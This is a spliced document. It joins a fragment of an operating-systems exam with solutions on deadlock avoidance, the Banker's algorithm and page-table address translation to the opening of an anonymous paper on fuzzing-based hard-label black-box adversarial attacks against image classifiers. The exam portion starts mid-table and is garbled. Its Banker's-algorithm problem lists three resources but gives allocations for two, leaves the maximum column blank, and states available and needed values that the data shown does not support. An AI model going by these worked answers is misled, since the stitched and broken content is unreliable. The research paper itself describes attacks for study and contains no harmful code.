<td>main</td>
<td>15</td>
<td>15</td>
<td>N/A</td>
<td>N/A</td>
</tr>
<tr>
<td>main</td>
<td>12</td>
<td>b</td>
<td>15</td>
<td>15</td>
<td>20</td>
<td>N/A</td>
</tr>
<tr>
<td>b</td>
<td>20</td>
<td>main</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td>N/A</td>
</tr>
<tr>
<td>main</td>
<td>14</td>
<td>c</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td>25</td>
</tr>
<tr>
<td>c</td>
<td>20</td>
<td>main</td>
<td>25</td>
<td>15</td>
<td>20</td>
<td>25</td>
</tr>
<tr>
<td>main</td>
<td>15</td>
<td>c</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td>25</td>
</tr>
<tr>
<td>c</td>
<td>23</td>
<td>main</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td>N/A</td>
</tr>
<tr>
<td>main</td>
<td>17</td>
<td>b</td>
<td>10</td>
<td>15</td>
<td>20</td>
<td>N/A</td>
</tr>
<tr>
<td>b</td>
<td>23</td>
<td>a</td>
<td>10</td>
<td>15</td>
<td>N/A</td>
<td>N/A</td>
</tr>
<tr>
<td>a</td>
<td>23</td>
<td>main</td>
<td>10</td>
<td>N/A</td>
<td>N/A</td>
<td>N/A</td>
</tr>
</tbody>
</table>
**Problem 4e [2pts]:** What is printed according to the order of execution in (4d)? Is the output affected by priorities in any way? Explain.
*What is printed is: “162cba!”. Yes, the output is affected by priorities in that thread “b” gets to acquire lock “b” before thread “a” acquires lock “a”. The ordering of letters happens in priority order.*
Problem 4f[4pts]:
Suppose that we have the following resources: A, B, C and threads T1, T2, T3, T4. The total number of each resource is:
<table>
<thead>
<tr>
<th></th>
<th>A</th>
<th>B</th>
<th>C</th>
</tr>
</thead>
<tbody>
<tr>
<td>Total</td>
<td>12</td>
<td>9</td>
<td>12</td>
</tr>
</tbody>
</table>
Further, assume that the processes have the following maximum requirements and current allocations:
<table>
<thead>
<tr>
<th rowspan="2">Thread ID</th>
<th colspan="2">Current Allocation</th>
<th rowspan="2">Maximum</th>
</tr>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>T1</td>
<td>2</td>
<td>1</td>
<td></td>
</tr>
<tr>
<td>T2</td>
<td>1</td>
<td>2</td>
<td></td>
</tr>
<tr>
<td>T3</td>
<td>5</td>
<td>4</td>
<td></td>
</tr>
<tr>
<td>T4</td>
<td>2</td>
<td>1</td>
<td></td>
</tr>
</tbody>
</table>
Is the system in a safe state? If “yes”, show a non-blocking sequence of thread executions. Otherwise, provide a proof that the system is unsafe. Show your work and justify each step of your answer.
Answer: Yes, this system is in a safe state.
To prove this, we first compute the currently free allocations:
<table>
<thead>
<tr>
<th></th>
<th>A</th>
</tr>
</thead>
<tbody>
<tr>
<td>Available</td>
<td>2</td>
</tr>
</tbody>
</table>
Further, we compute the number needed by each thread (Maximum – Current Allocation):
<table>
<thead>
<tr>
<th rowspan="2">Thread ID</th>
<th>Needed Allocation</th>
</tr>
<tr>
<th>A</th>
</tr>
</thead>
<tbody>
<tr>
<td>T1</td>
<td>2</td>
</tr>
<tr>
<td>T2</td>
<td>4</td>
</tr>
<tr>
<td>T3</td>
<td>1</td>
</tr>
<tr>
<td>T4</td>
<td>2</td>
</tr>
</tbody>
</table>
Thus, we can see that a possible sequence is: T3, T2, T4, T1.
Problem 4g [3pts]:
Assume that we start with a system in the state of (4f). Suppose that T1 asks for 2 more copies of resource A. Can the system grant this if it wants to avoid deadlock? Explain.
*No. This cannot be granted. Assume that T1 gets 2 more of A.*
Then, our available allocation is:
<table>
<thead>
<tr>
<th></th>
<th>A</th>
</tr>
</thead>
<tbody>
<tr>
<td>Available</td>
<td>0</td>
</tr>
</tbody>
</table>
Then, looking at our needed allocations, we see:
<table>
<thead>
<tr>
<th rowspan="2">Thread ID</th>
<th>Needed Allocation</th>
</tr>
<tr>
<th>A</th>
</tr>
</thead>
<tbody>
<tr>
<td>T1</td>
<td>0</td>
</tr>
<tr>
<td>T2</td>
<td>4</td>
</tr>
<tr>
<td>T3</td>
<td>1</td>
</tr>
<tr>
<td>T4</td>
<td>2</td>
</tr>
</tbody>
</table>
At this point, the available allocation is insufficient to start any of the threads, much less find a safe sequence that finishes all of them.
Problem 4h [2pts]: Assume that a set of threads (T1, T2, ... Tn) contend for a set of non-preemptable resources (R1, R2, ... Rm) that may or may not be unique. Name at least two techniques to prevent this system from deadlocking:
We discussed several possible ways of preventing deadlock in class. Possibilities include:
1) Pick a fixed order of allocation (say R1 then R2 then ... Rm). All threads should allocate resources in this order.
2) Every thread should indicate which resources they want at the beginning of execution. Then, the thread is not allowed to start until after the requested resources are all available.
3) Use the Banker's algorithm on every allocation request to make sure that the system stays in a safe state.
Problem 5: Address Translation [20 pts]
Problem 5a[3pts]: In class, we discussed the “magic” address format for a multi-level page table on a 32-bit machine, namely one that divided the address as follows:
<table>
<thead>
<tr>
<th>Virtual Page # (10 bits)</th>
<th>Virtual Page # (10 bits)</th>
<th>Offset (12 bits)</th>
</tr>
</thead>
</table>
You can assume that Page Table Entries (PTEs) are 32-bits in size in the following format:
<table>
<thead>
<tr>
<th>Physical Page # (20 bits)</th>
<th>OS Defined (3 bits)</th>
<th>0</th>
<th>Large Page</th>
<th>Dirty</th>
<th>Accessed</th>
<th>Nocache</th>
<th>Write Through</th>
<th>User</th>
<th>Writeable</th>
<th>Valid</th>
</tr>
</thead>
</table>
What is particularly “magic” about this configuration? Make sure that your answer involves the size of the page table and explains why this configuration is helpful for an operating system attempting to deal with limited physical memory.
Each page is 4K in size (12-bit offset \( \Rightarrow 2^{12} \) bytes). Because the PTE is 4-bytes long and each level of the page table has 1024 entries (i.e. 10-bit virtual page #), this means that each level of the page table is 4K in size, i.e. exactly the same size as a page. Thus the configuration is “magic” because every level of the page table takes exactly one page. This is helpful for an operating system because it allows the OS to page out parts of the page table to disk.
Problem 5b[2pts]: Modern processors nominally address 64-bits of address space both virtually and physically (in reality they provide access to less, but ignore that for now). Explain why the page table entries (PTEs) given in (5a) would have to be expanded from 4 bytes and justify how big they would need to be. Assume that pages are the same size and that the new PTE has similar control bits to the version given in (5a).
Since we are attempting to address 64-bits of physical DRAM and the page offset is 12-bits, this leaves 52-bits of physical page # that will have to fit into the PTE. The old PTE had only 20-bits of space for the physical page #, so we need another 32-bits ⇒ the PTE needs 52-bits of physical page # + 12-bits of control bits (to keep the same controls), yielding a 64-bit PTE, or 8-bytes.
Problem 5c[2pts]: Assuming that we reserve 8-bytes for each PTE in the page table (whether or not they need all 8 bytes), how would the virtual address be divided for a 64-bit address space? Make sure that your resulting scheme has a similar “magic” property as in (5a) and that all levels of the page table are the same size—with the exception of the top-level. How many levels of page table would this imply? Explain your answer!
To have the same “magic” property, we would like each level of the page table to be the same size as a page, so that the OS can page out individual parts of the page table. Since a PTE is 8 bytes (\(2^3\) bytes), a 4K page holds \(2^{12-3} = 2^9\) PTEs, so we need 12 − 3 = 9 bits of virtual page # at each level. This means that the virtual address is divided into groups of 9 bits (although the top level will be smaller, since we only have 64 bits in total):
\[ [7\text{-bits}][9\text{-bits}][9\text{-bits}][9\text{-bits}][9\text{-bits}][9\text{-bits}][12\text{-bits offset}] \]
Thus, there are 6 levels of page table.
**Problem 5d[3pts]:** Consider a multi-level memory management scheme using the following format for *virtual addresses*, including 2 bits worth of segment ID and an 8-bit virtual page number:
<table>
<thead>
<tr>
<th>Virtual seg # (2 bits)</th>
<th>Virtual Page # (8 bits)</th>
<th>Offset (8 bits)</th>
</tr>
</thead>
</table>
Virtual addresses are translated into 16-bit *physical addresses* of the following form:
<table>
<thead>
<tr>
<th>Physical Page # (8 bits)</th>
<th>Offset (8 bits)</th>
</tr>
</thead>
</table>
Page table entries (PTE) are 16 bits in the following format, *stored in big-endian form* in memory (i.e. the MSB is first byte in memory):
<table>
<thead>
<tr>
<th>Physical Page # (8 bits)</th>
<th>Kernel</th>
<th>Nocache</th>
<th>0</th>
<th>0</th>
<th>Dirty</th>
<th>Use</th>
<th>Writeable</th>
<th>Valid</th>
</tr>
</thead>
</table>
1) How big is a page? Explain.
*A page is $2^8=256$ bytes.*
2) What is the maximum amount of physical memory supported by this scheme? Explain.
*Physical addresses have 16-bits $\Rightarrow 2^{16}=65536$ bytes (i.e. 64K bytes)*
**Problem 5e[10pts]:** Using the scheme from (5d) and the Segment Table and Physical Memory table on the next page, state what will happen with the following loads and stores. Addresses below are virtual, while base addresses in the segment table are physical. If you can translate the address, make sure to place it in the “Physical Address” column; otherwise state “N/A”.
The return value for a load is an 8-bit data value or an error, while the return value for a store is either “ok” or an error. If there is an error, say which error. Possibilities are: “bad segment” (invalid segment), “segment overflow” (address outside segment), or “access violation” (page invalid/attempt to write a read only page). A few answers are given:
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Translated Physical Address</th>
<th>Result (return value)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Load [0x30115]</td>
<td>0x3115</td>
<td>0x57</td>
</tr>
<tr>
<td>Store [0x10345]</td>
<td>0x3145</td>
<td>Access violation</td>
</tr>
<tr>
<td>Store [0x30316]</td>
<td>0xF016</td>
<td>ok</td>
</tr>
<tr>
<td>Load [0x01202]</td>
<td>0xF002</td>
<td>0x22</td>
</tr>
<tr>
<td>Store [0x31231]</td>
<td>0xE031</td>
<td>Access violation</td>
</tr>
<tr>
<td>Store [0x21202]</td>
<td>N/A</td>
<td>Bad segment</td>
</tr>
<tr>
<td>Load [0x11213]</td>
<td>N/A</td>
<td>Segment overflow</td>
</tr>
<tr>
<td>Load [0x01515]</td>
<td>0x3015 or N/A</td>
<td>Access violation</td>
</tr>
</tbody>
</table>
### Segment Table (Segment limit = 3)
<table>
<thead>
<tr>
<th>Seg #</th>
<th>Page Table Base</th>
<th>Max Pages in Segment</th>
<th>Segment State</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>0x2030</td>
<td>0x20</td>
<td>Valid</td>
</tr>
<tr>
<td>1</td>
<td>0x1020</td>
<td>0x10</td>
<td>Valid</td>
</tr>
<tr>
<td>2</td>
<td>0xF040</td>
<td>0x40</td>
<td>Invalid</td>
</tr>
<tr>
<td>3</td>
<td>0x4000</td>
<td>0x20</td>
<td>Valid</td>
</tr>
</tbody>
</table>
### Physical Memory
<table>
<thead>
<tr>
<th>Address</th>
<th>+0</th>
<th>+1</th>
<th>+2</th>
<th>+3</th>
<th>+4</th>
<th>+5</th>
<th>+6</th>
<th>+7</th>
<th>+8</th>
<th>+9</th>
<th>+A</th>
<th>+B</th>
<th>+C</th>
<th>+D</th>
<th>+E</th>
<th>+F</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x0000</td>
<td>0E</td>
<td>0F</td>
<td>10</td>
<td>11</td>
<td>12</td>
<td>13</td>
<td>14</td>
<td>15</td>
<td>16</td>
<td>17</td>
<td>18</td>
<td>19</td>
<td>1A</td>
<td>1B</td>
<td>1C</td>
<td>1D</td>
</tr>
<tr>
<td>0x0010</td>
<td>1E</td>
<td>1F</td>
<td>20</td>
<td>21</td>
<td>22</td>
<td>23</td>
<td>24</td>
<td>25</td>
<td>26</td>
<td>27</td>
<td>28</td>
<td>29</td>
<td>2A</td>
<td>2B</td>
<td>2C</td>
<td>2D</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x1010</td>
<td>40</td>
<td>41</td>
<td>42</td>
<td>43</td>
<td>44</td>
<td>45</td>
<td>46</td>
<td>47</td>
<td>48</td>
<td>49</td>
<td>4A</td>
<td>4B</td>
<td>4C</td>
<td>4D</td>
<td>4E</td>
<td>4F</td>
</tr>
<tr>
<td>0x1020</td>
<td>40</td>
<td>03</td>
<td>41</td>
<td>01</td>
<td>30</td>
<td>01</td>
<td>31</td>
<td>01</td>
<td>00</td>
<td>03</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>0x1030</td>
<td>00</td>
<td>11</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
</tr>
<tr>
<td>0x1040</td>
<td>10</td>
<td>01</td>
<td>11</td>
<td>03</td>
<td>31</td>
<td>03</td>
<td>13</td>
<td>00</td>
<td>14</td>
<td>01</td>
<td>15</td>
<td>03</td>
<td>16</td>
<td>01</td>
<td>17</td>
<td>00</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x2030</td>
<td>10</td>
<td>01</td>
<td>11</td>
<td>00</td>
<td>12</td>
<td>03</td>
<td>67</td>
<td>03</td>
<td>11</td>
<td>03</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>0x2040</td>
<td>02</td>
<td>20</td>
<td>03</td>
<td>30</td>
<td>04</td>
<td>40</td>
<td>05</td>
<td>50</td>
<td>01</td>
<td>60</td>
<td>03</td>
<td>70</td>
<td>08</td>
<td>80</td>
<td>09</td>
<td>90</td>
</tr>
<tr>
<td>0x2050</td>
<td>10</td>
<td>00</td>
<td>31</td>
<td>01</td>
<td>F0</td>
<td>03</td>
<td>F0</td>
<td>01</td>
<td>12</td>
<td>03</td>
<td>30</td>
<td>00</td>
<td>10</td>
<td>00</td>
<td>10</td>
<td>01</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x3100</td>
<td>01</td>
<td>12</td>
<td>23</td>
<td>34</td>
<td>45</td>
<td>56</td>
<td>67</td>
<td>78</td>
<td>89</td>
<td>9A</td>
<td>AB</td>
<td>BC</td>
<td>CD</td>
<td>DE</td>
<td>EF</td>
<td>00</td>
</tr>
<tr>
<td>0x3110</td>
<td>02</td>
<td>13</td>
<td>24</td>
<td>35</td>
<td>46</td>
<td>57</td>
<td>68</td>
<td>79</td>
<td>8A</td>
<td>9B</td>
<td>AC</td>
<td>BD</td>
<td>CE</td>
<td>DF</td>
<td>F0</td>
<td>01</td>
</tr>
<tr>
<td>0x3120</td>
<td>03</td>
<td>01</td>
<td>25</td>
<td>36</td>
<td>47</td>
<td>58</td>
<td>69</td>
<td>7A</td>
<td>8B</td>
<td>9C</td>
<td>AD</td>
<td>BE</td>
<td>CF</td>
<td>E0</td>
<td>F1</td>
<td>02</td>
</tr>
<tr>
<td>0x3130</td>
<td>04</td>
<td>15</td>
<td>26</td>
<td>37</td>
<td>48</td>
<td>59</td>
<td>70</td>
<td>7B</td>
<td>8C</td>
<td>9D</td>
<td>AE</td>
<td>BF</td>
<td>D0</td>
<td>E1</td>
<td>F2</td>
<td>03</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0x4000</td>
<td>30</td>
<td>00</td>
<td>31</td>
<td>01</td>
<td>11</td>
<td>01</td>
<td>F0</td>
<td>03</td>
<td>34</td>
<td>01</td>
<td>35</td>
<td>00</td>
<td>43</td>
<td>38</td>
<td>32</td>
<td>79</td>
</tr>
<tr>
<td>0x4010</td>
<td>50</td>
<td>28</td>
<td>84</td>
<td>19</td>
<td>71</td>
<td>69</td>
<td>39</td>
<td>93</td>
<td>75</td>
<td>10</td>
<td>58</td>
<td>20</td>
<td>97</td>
<td>49</td>
<td>44</td>
<td>59</td>
</tr>
<tr>
<td>0x4020</td>
<td>23</td>
<td>03</td>
<td>20</td>
<td>03</td>
<td>E0</td>
<td>01</td>
<td>E1</td>
<td>08</td>
<td>E2</td>
<td>86</td>
<td>28</td>
<td>03</td>
<td>48</td>
<td>25</td>
<td>34</td>
<td>21</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0xE000</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
<td>AA</td>
<td>55</td>
</tr>
<tr>
<td>0xE010</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
<td>A5</td>
<td>5A</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td>0xF000</td>
<td>00</td>
<td>11</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
</tr>
<tr>
<td>0xF010</td>
<td>11</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
<td>00</td>
</tr>
<tr>
<td>0xF020</td>
<td>22</td>
<td>33</td>
<td>44</td>
<td>55</td>
<td>66</td>
<td>77</td>
<td>88</td>
<td>99</td>
<td>AA</td>
<td>BB</td>
<td>CC</td>
<td>DD</td>
<td>EE</td>
<td>FF</td>
<td>00</td>
<td>11</td>
</tr>
<tr>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
<td>...</td>
</tr>
</tbody>
</table>
[ This page left for scratch ]
FUZZING-BASED HARD-LABEL BLACK-BOX ATTACKS AGAINST MACHINE LEARNING MODELS
Anonymous authors
Paper under double-blind review
ABSTRACT
Machine learning models are known to be vulnerable to adversarial examples. Based on different levels of knowledge that attackers have about the models, adversarial example generation methods can be categorized into white-box and black-box attacks. We study the most realistic attacks, hard-label black-box attacks, where attackers only have the query access of a model and only the final predicted labels are available. The main limitation of the existing hard-label black-box attacks is that they need a large number of model queries, making them inefficient and even infeasible in practice. Inspired by the very successful fuzz testing approach in traditional software testing and computer security domains, we propose fuzzing-based hard-label black-box attacks against machine learning models. We design an AdvFuzzer to explore multiple paths between a source image and a guidance image, and design a LocalFuzzer to explore the nearby space around a given input for identifying potential adversarial examples. We demonstrate that our fuzzing attacks are feasible and effective in generating successful adversarial examples with significantly reduced number of model queries and $L_0$ distance. More interestingly, supplied with a successful adversarial example as a seed, LocalFuzzer can immediately generate more successful adversarial examples even with smaller $L_2$ distance from the source example, indicating that LocalFuzzer itself can be an independent and useful tool to augment many adversarial example generation algorithms.
1 INTRODUCTION
Machine learning models, especially deep neural networks, have been demonstrated to be vulnerable to adversarial examples (Biggio et al., 2013; Szegedy et al., 2014). Adversarial examples are generated by adding small perturbations to clean inputs to fool machine learning models into misclassifying. In image classification tasks, adversarial examples can be found by many attack methods (Goodfellow et al., 2015; Papernot et al., 2016b; Kurakin et al., 2017; Carlini & Wagner, 2017) with the knowledge of a neural network architecture and its parameters. Attacks of this type are referred to as white-box attacks. While research on white-box attacks significantly helps the community to better understand adversarial examples and deep neural networks, white-box attacks are only applicable to limited real-world scenarios such as publicly available models or exposed confidential models.
In many real-world scenarios, black-box attacks are more realistic, where an attacker only has the query access to a model. Some recent attacks (Narodytska & Kasiviswanathan, 2017; Chen et al., 2017; Hayes & Danezis, 2018; Ilyas et al., 2018) rely on probability vectors (e.g., predicted scores or logits) of a model to generate adversarial examples, and they are referred to as soft-label black-box attacks. However, in many more realistic scenarios, only the final predicted labels (e.g., the top-1 class label) of a model are available to the attackers. This category of attacks is referred to as hard-label black-box attacks. Three recent attack methods including Boundary attack (Brendel et al., 2017), Label-only attack (Ilyas et al., 2018), and Opt attack (Cheng et al., 2019) fall into this category. However, although they can generate adversarial examples with comparable perturbations to white-box attacks, the main limitation of existing hard-label black-box attacks is that they need a large number of model queries since model information is not available.
From a unique perspective, we propose fuzzing-based hard-label black-box attacks by leveraging the fuzzing approach that is very successful in software testing and computer security domains (My-
The generation of adversarial examples can be essentially considered as an optimization problem. In order to find an optimal adversarial example around a clean input, attack algorithms need information such as gradient of the loss function, vectors of classification probability, or hard labels from a model as guidance to walk toward the goal. The adversarial examples then cause the model to misclassify. Interestingly, we consider the following analogy: a machine learning model to be attacked is similar to a target program to be tested for correctness or security bugs. Adversarial examples that cause a model to misclassify are analogous to inputs that trigger a target program to crash. These similarities and the huge success of the fuzzing approach in those traditional domains inspire us to leverage an originally black-box software testing technique, *fuzz testing*, for exploring black-box adversarial example attacks in the adversarial machine learning domain.
The word “fuzz” was first proposed by Miller et al. (1990) to represent random, unexpected, and unstructured data (Takanen et al., 2008). Fuzz testing aims to find program failures by iteratively and randomly generating inputs to test a target program (Klees et al., 2018). It is a very effective approach to identifying correctness or security bugs in traditional software systems (Haller et al., 2013; Appelt et al., 2014; Jeong et al., 2019) as well as development or deployment bugs in machine learning models (Odena et al., 2019; Xie et al., 2018).
In this paper, we propose fuzzing-based attacks against machine learning models in hard-label black-box settings. We take the fuzz testing approach to generate random inputs for exploring the adversarial example space. We design two fuzzers: an adversarial fuzzer (referred to as AdvFuzzer) and a local fuzzer (referred to as LocalFuzzer). AdvFuzzer explores multiple paths from a clean example to a guidance example. LocalFuzzer explores the nearby space around a given input. Our approach can be applied in both targeted and untargeted settings, aiming to generate adversarial examples using a much smaller number of model queries than existing hard-label black-box attacks. Note that when a successful adversarial example is supplied as the input, LocalFuzzer has the potential to generate a large number of other successful adversarial examples in bulk. This bulk generation can be applied to adversarial examples generated from any attack methods, and potentially refine their “optimized” adversarial examples by reducing the $L_2$ distance from the source example.
We perform experiments to attack deep neural networks for MNIST and CIFAR-10 datasets to evaluate our fuzzing approach. The experimental results show that our fuzzing attacks are feasible, efficient, and effective. For example, the number of model queries can be reduced by 10-18 folds for MNIST and 2-5 folds for CIFAR-10 in untargeted attacks in comparison between ours and existing hard-label black-box methods. We also evaluate our LocalFuzzer on successful examples generated by Boundary attack, Opt attack, and our fuzzing attacks to validate its usefulness. For example, we achieve 100% success bulk generation rate and 48%-100% success bulk generation rate with lower $L_2$ for MNIST adversarial examples generated by different methods in untargeted attacks. Our work provides evidence on the feasibility and benefits of fuzzing-based attacks. To the best of our knowledge, this is the first work on exploring fuzz testing in adversarial example attacks.
## 2 Background and Related Work
**Adversarial Examples** In this paper, we consider computer vision classification tasks, in which a DNN model $f$ aims to classify an input image $x$ to a class $y$. We define a clean input image $x$ as *source example* with source class $y$. The attack goal is to generate an adversarial example $x'$ close to source example $x$ such that: (1) $x'$ is misclassified as any class other than the source class $y$ in the *untargeted attack* setting, or (2) $x'$ is misclassified as a specific class $y' \neq y$ in the *targeted attack* setting. We consider an adversary with the hard-label black-box capability, which means the adversary only has query access to the model $f$ and only final label outputs are available.
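The untargeted and targeted goals above reduce to a single hard-label check. The following Python sketch (function and variable names are ours, not from the paper) assumes `f` returns only the top-1 predicted label, matching the hard-label black-box setting:

```python
def is_adversarial(f, x_adv, source_class, targeted=False, target_class=None):
    """Check the hard-label attack goal for a candidate x_adv.

    Only the final predicted label f(x_adv) is used, as in the
    hard-label black-box setting described above.
    """
    label = f(x_adv)
    if targeted:
        # Targeted attack: must be classified as the chosen target class.
        return label == target_class
    # Untargeted attack: any label other than the source class succeeds.
    return label != source_class
```

Each model query in the attacks below amounts to one evaluation of such a predicate, which is why the number of queries is the natural cost metric.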
**White-box attacks** Most existing attacks rely on full access to the model architecture and parameters. Example attack algorithms include Fast Gradient Sign Method (Goodfellow et al., 2015), Jacobian-based Saliency Map Approach (Papernot et al., 2016b), Basic Iterative Method (Kurakin et al., 2017), L-BFGS (Szegedy et al., 2014), Carlini & Wagner attack (Carlini & Wagner, 2017), etc. White-box attacks need gradient information of the loss function as guidance to find adversarial examples. However, the white-box scenarios are not very realistic considering the fact that many real-world machine learning models are confidential. Besides, white-box attacks can only be applied to differentiable model architectures like DNNs not to tree-based models.
Black-box attacks In many real-world scenarios, black-box attacks are more realistic where attackers only have the query access to the model and do not have detailed model information. One type of black-box attacks is transferability-based (Papernot et al., 2017), where an adversary trains a substitute model with a substitute dataset and then generates adversarial examples from the substitute model using white-box attacks. Because of the transferability (Szegedy et al., 2014; Goodfellow et al., 2015; Papernot et al., 2016a), adversarial examples generated from the substitute model can potentially fool the targeted model, even if the two models have different architectures. One limitation of this approach is that it needs information about training data. Besides, attacking the substitute model leads to larger perturbation and lower success rate (Chen et al., 2017; Papernot et al., 2016a, 2017).
Soft-label black-box attacks (Chen et al., 2017; Narodytska & Kasiviswanathan, 2017; Ilyas et al., 2018) rely on classification probability to generate adversarial examples. Since the classification probability vectors are usually inaccessible, hard-label black-box attacks are considered as more realistic, where only the final predicted labels are available to the attackers. Boundary attack (Brendel et al., 2017) is based on a random walk around the decision boundary using examples drawn from a proposal distribution. Label-only attack (Ilyas et al., 2018) uses discretized score, image robustness of random perturbation, and Monte Carlo approximation to find a proxy for the output probability and then uses an NES gradient estimator to generate adversarial examples in a similar way as soft-label black-box attacks. Opt attack (Cheng et al., 2019) reformulates the problem as a continuous real-valued optimization problem which can be solved by any zeroth-order optimization algorithm. The main limitation of these existing hard-label black-box attacks is that they need a large number of model queries, in part because they follow the traditional (approximated) optimization approach and they all aim to walk closer to a clean example starting from a point that is already adversarial. This limitation makes them inefficient and even infeasible in practice when the allowed number of queries is limited by a model. In contrast, our fuzzing-based hard-label black-box attacks start from a clean example and walk away from it step by step. With careful guidance and leveraging the randomness advantage of the fuzz testing approach, our attacks have the potential to use a much smaller number of queries to generate a successful adversarial example.
3 Approach and Algorithms
3.1 Overview of our Approach
Fuzz testing was first proposed by Miller et al. (1990). The key idea is to use random, unexpected, and unstructured data to find program failures. In recent years, fuzzers such as AFL (Zalewski 2007) and libFuzzer (Serebryany 2016) have gained great popularity because of their effectiveness and scalability. A typical fuzzer works by iteratively (1) selecting a seed input from a pool, (2) mutating the chosen seed to generate new inputs, (3) evaluating the newly generated inputs, and (4) recording observations such as program crashes and adding useful inputs into the seed pool. Our fuzzing-based hard-label black-box attacks leverage the basic idea of fuzz testing to explore the adversarial example space.
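The four-step loop above can be sketched in a few lines. This is a generic illustration of fuzz testing (the names and the crash-as-exception convention are ours), not AFL or libFuzzer themselves:

```python
import random

def fuzz(target, seeds, mutate, is_interesting, max_iters=1000):
    """Minimal fuzz loop: (1) pick a seed, (2) mutate it,
    (3) run the target, (4) record crashes and keep useful inputs."""
    pool = list(seeds)
    crashes = []
    for _ in range(max_iters):
        seed = random.choice(pool)          # (1) seed selection
        candidate = mutate(seed)            # (2) mutation
        try:
            result = target(candidate)      # (3) evaluation
        except Exception:
            crashes.append(candidate)       # (4a) record a "crash"
            continue
        if is_interesting(candidate, result):
            pool.append(candidate)          # (4b) grow the seed pool
    return crashes, pool
```

In our attacks, the "target program" is the model under attack and a "crash" corresponds to a misclassification that meets the attack goal.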
Figure 1 depicts the basic intuition of our attacks. We design two fuzzers: an adversarial fuzzer (referred to as AdvFuzzer) and a local fuzzer (referred to as LocalFuzzer). Starting from a source image which is clean, AdvFuzzer slowly (thus with less amount of perturbations) walks away from it step by step by randomly selecting a path toward a guidance image. With multiple runs, AdvFuzzer will explore multiple random paths aiming to explore different regions of the adversarial example space between the two images. The guidance image could be a clean image of a specific target class for performing targeted attacks, or any image not of the source (image) class for performing untargeted attacks. LocalFuzzer aims to explore the nearby
data points for identifying potential adversarial examples around the current image as AdvFuzzer takes the main steps.
It is important to point out that AdvFuzzer walks from a source image to a guidance image, thus taking a reverse direction from what is taken in existing hard-label black-box attacks including Boundary attack (Brendel et al., 2017), Label-only attack (Ilyas et al., 2018), and Opt attack (Cheng et al., 2019). Combining this strategy with the randomness advantage of the fuzz testing approach, our attacks have the potential to use a much smaller number of queries to more efficiently or practically generate successful adversarial examples. Moreover, LocalFuzzer can indeed be applied to any attack methods including black-box and white-box ones. When LocalFuzzer is supplied with a successful adversarial example as a seed, it can efficiently generate new successful adversarial examples in bulk and among which further optimized (e.g., in terms of reducing the $L_2$ distance from the source image) ones could even be identified.
3.2 ALGORITHMS
